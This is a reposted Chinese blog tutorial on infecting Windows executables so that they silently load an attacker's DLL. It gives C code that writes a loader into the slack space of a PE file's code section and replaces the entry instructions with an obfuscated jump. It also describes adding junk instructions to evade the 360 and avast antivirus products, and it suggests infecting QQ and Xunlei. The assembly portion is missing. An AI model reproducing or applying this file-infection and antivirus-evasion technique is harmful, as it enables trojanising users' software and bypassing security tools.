感染可执行文件加载Dll

来源:互联网 发布:防闪退的软件 编辑:程序博客网 时间:2024/06/08 05:26

 

       以前看过一篇文章《捆绑任意可执行文件做木马》深感作者对汇编运用之熟练。但经过实际练习感觉到办法还有些欠缺,比如说修改文件头AddressOfEntryPoint域的RVA这一招连360都盯上了。另外创建一个节来写入数据使程序变得臃肿。实际上每一个可执行文件的代码节都有很大的剩余空间没利用,我们只要在剩余空间里写入不到200个字节的Dll启动代码就行了。

本文假设读者已经具备了汇编语言pe结构体和使用msdn的能力

      本文的主要思路是:

找出目标文件剩余空间

将开始的代码修改为跳转指令跳转到指定的代码处

在剩余空间里写入启动代码

在剩余空间里写入被修改的代码和回跳代码

被感染后的文件执行流程如图一所示:



 

还是看看具体的实现代码吧:


 


 

对一个pe文件修改最方便的还是用CreateFile()CreateFileMapping()之类的api函数来创建一个文件映像。这些就不多说了不懂的可以看msdn

假设我们得到的文件映像基地址是pFileImage首先定位文件的代码段(这里需要用到pe文件的知识)


 


 

目标文件剩余空间主要是由pSecHeader[i].SizeOfRawDatapSecHeader[i].Misc.VirtualSize的差值决定的

DWORD    ExtraData     =pSecHeader[i].SizeOfRawData - pSecHeader[i].Misc .VirtualSize ;

找到代码节的文件末尾

byte        *pTextEnd= (byte *)pFileImage + pSecHeader[i].PointerToRawData + pSecHeader[i].SizeOfRawData- 1;

得到插入代码的位置:

byte        *pInjectPoint                       = pTextEnd     - ExtraData;

指向需要修改的指令

byte *ToChg   = (byte *)pFileImage +pOptionalHeader->AddressOfEntryPoint ;

得到要跳转到的地址:

DWORD               TargetAddr     = (DWORD)pInjectPoint;

下面就该将开始的指令修改为跳转到插入代码的位置了,为了不影响目标的程序正常运行需要把被修改的代码保存起来放在插入代码的后面

byte *ToRchg         = (byte *)calloc ( 30 ,sizeof(byte ));


修改代码可以调用一个函数来完成:

DWORD BackAddr=ChangeCode ( ToChg , pOptionalHeader->ImageBase + (TargetAddr -(DWORD)pFileImage ),ToRchg ,&BeChangedCodeSum );

 


其中ToChg指向要被修改的代码,pOptionalHeader->ImageBase + (TargetAddr - (DWORD)pFileImage )恰好是插入代码的地址也就是要跳转到的地址,ToRchg是指向保存被修改代码缓冲区的指针BeChangedCodeSum是被修改的代码长度


现在问题来了,要实现跳转就得修改具体的十六进制数据而我们知道intel是复杂指令集这里的复杂绝非空穴来风,每一条指令要占有几字节空间必须是十分熟悉的。怎么办上网找了久终于发现了一个长度反汇编引擎可以解决这个问题。引擎找到了但跳转指令怎么实现呢?


看过Leminis的《用开源反汇编引擎检测inline hook》就提到了跳转的几种方法:

1jmp   xxxxxxxx覆盖原来的指令(xxxxxxxx是跳转指令相对偏移)占用5字节

2jmp   Far xxxxxxxx覆盖原来的指令其中xxxxxxxx是绝对地址占用7字节

3:先用push xxxxxxxx后直接用retn返回

但是这些都是众所周之的办法早就被检测工具盯紧了,应当采用一种更安全的办法才行

比如说我用

mov ebpTargetAddr      push      ebp         retn

这三个指令来完成,你如果觉得还是不够安全可以在三个指令中间加入一些花指令来扰乱检测工具,但可别忘了在最后把修改的代码修改回来。

 

看看函数的详细实现:


 


 

现在该看看插入代码了:插入代码最好用汇编语言来实现因为我们还要加入跳转指令如果用c就不好实现了

启动目标Dll代码

 

 

 

 



 

 


 

////得到跳转地址,注意这里的跳转为相对地址(相对本指令所在位置)5为跳转指令的大小

BackAddr -= (5 + (DWORD)pInjectPoint +Inject_data_length + BeChangedCodeSum );

//写入附加数据也就是上面略去的那段汇编代码

       for(i = 0; i < Inject_data_length ; i++)

                                   *pInjectPoint++           = *pInject_data ++;

//写入被修改的代码

       for(byte i = 0;i < BeChangedCodeSum;i ++ )

               *pInjectPoint ++                              = *ToRchg ++;

///增加回跳代码。

       byte        jmp                                     =0xE9;

       *pInjectPoint++                                = jmp;

       byte        *pBackAddr                        = (byte *) &BackAddr ;

       for(int i = 0;i < 4;i ++ )

              *pInjectPoint++                         = *pBackAddr++;

///修改文件头

pSecHeader[i].Misc .VirtualSize          += Inject_data_length + BeChangedCodeSum+ 5;

 

最后完成一些收尾工作:

       UnmapViewOfFile(pImageView  );

       CloseHandle( hFileMapHandle );

       CloseHandle( hFileHandle );

       printf("感染成功!!/n");

好了现在看一下感染的效果,我在目标Dll仅弹出一个对话框表明感染成功。

运行Target.exe可以看到Dll代码已经被执行了 如图2所示:


 

 


 

但是打开杀毒软件(avast)报告是病毒程序,这时程序没运行能查到病毒肯定是基于特征码扫描的,也就是说我们的程序里有常规编程所没有的特征码,我想了很久做了很多次试验发现在上面的234,行之间加入一些无关指令就能绕开杀软的查杀。仔细看上面的汇编代码是要通过调用GetProcAddress函数来得到LoadLibraryA函数的地址,但是参数传递的办法太明显了:在c中调用办法是:GetProcAddress(hModule,”LoadLibraryA”);生成的可执行文件压栈的仅仅是”LoadLibraryA”的首地址,字符串”LoadLibraryA”通常被放在pe文件的数据段中,而我们的LoadLibraryA因为要压栈来传递所以代码段里就有了它的身影(可能好多病毒都会调用LoadLibraryA这个函数所以被杀软盯上了)。在234行之间加入一些干扰的指令再次编译让avast来扫描就不会在报毒了。

读者可以在Dll中加入自己的代码 

好了现在可以让我们的代码来感染QQ,迅雷等应用软件了 不过我发现被感染的QQ无法正常启动,想想也是这么出名的软件肯定得有自检测机制,但是解除自检测机制不在本文讨论范围我也就不多说了。

[本文涉及的代码在vs2005 + xp3下编译通过]